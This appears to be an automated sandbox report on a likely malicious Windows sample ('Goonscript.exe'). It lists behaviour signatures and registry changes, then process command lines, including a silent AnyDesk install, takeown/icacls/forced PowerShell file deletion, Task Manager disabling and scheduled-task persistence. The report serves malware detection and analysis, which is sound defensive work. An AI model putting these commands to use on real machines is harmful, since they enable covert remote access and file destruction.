Analysis Overview
Threat Level: Likely malicious
The file https://t.co/qAuDl4bh13 was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
Loads dropped DLL
Checks computer location settings
Modifies file permissions
Executes dropped EXE
Checks installed software on the system
Drops file in System32 directory
Enumerates physical storage devices
Creates scheduled task(s)
Checks processor information in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Modifies registry key
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-05 18:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-05 18:12
Reported
2024-06-05 18:17
Platform
win10v2004-20240226-en
Max time kernel
263s
Max time network
269s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\ProgramData\stn.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\doorbell-upd.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\locked.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\stn.exe | N/A |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Anydesk.exe | N/A |
| N/A | N/A | C:\ProgramData\AnyDesk.exe | N/A |
Modifies file permissions
Checks installed software on the system
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db | C:\ProgramData\Anydesk.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace | C:\ProgramData\Anydesk.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\ProgramData\Anydesk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\ProgramData\Anydesk.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\ProgramData\Anydesk.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{31CD515F-C7B0-443D-80F5-BFE4F635729C} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{FA0D303D-4D21-4141-9163-41011D528D26} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command | \??\c:\users\Admin\downloads\AnyDesk.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Goonscript.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.co/qAuDl4bh13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=5356 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=5740 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5872 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=4272 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6000 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=5600 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=5632 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4828 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=5720 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=4212 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5884 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=5960 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --mojo-platform-channel-handle=6280 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --mojo-platform-channel-handle=6156 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --mojo-platform-channel-handle=6232 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6816 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=6916 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6860 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x23c,0x240,0x244,0x234,0x238,0x7ffe57e72e98,0x7ffe57e72ea4,0x7ffe57e72eb0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2724 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2832 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2944 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4404 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4404 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\Desktop\Goonscript.exe
"C:\Users\Admin\Desktop\Goonscript.exe"
C:\Windows\system32\wscript.exe
"C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\F75B.tmp\F75C.tmp\F75D.vbs //Nologo
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
"C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2D5.tmp\2D6.tmp\2D7.bat C:\Users\Admin\AppData\Roaming\doorbell-upd.exe"
C:\Windows\system32\takeown.exe
takeown /f "C:\programdata\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\programdata\stn.exe" /reset
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "C:\programdata\stn.exe" -r -force
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:/users/Admin/downloads/Anydesk.exe" --install "C:\ProgramData" --silent
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ctt.ac/Y6e79
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4728 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4764 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
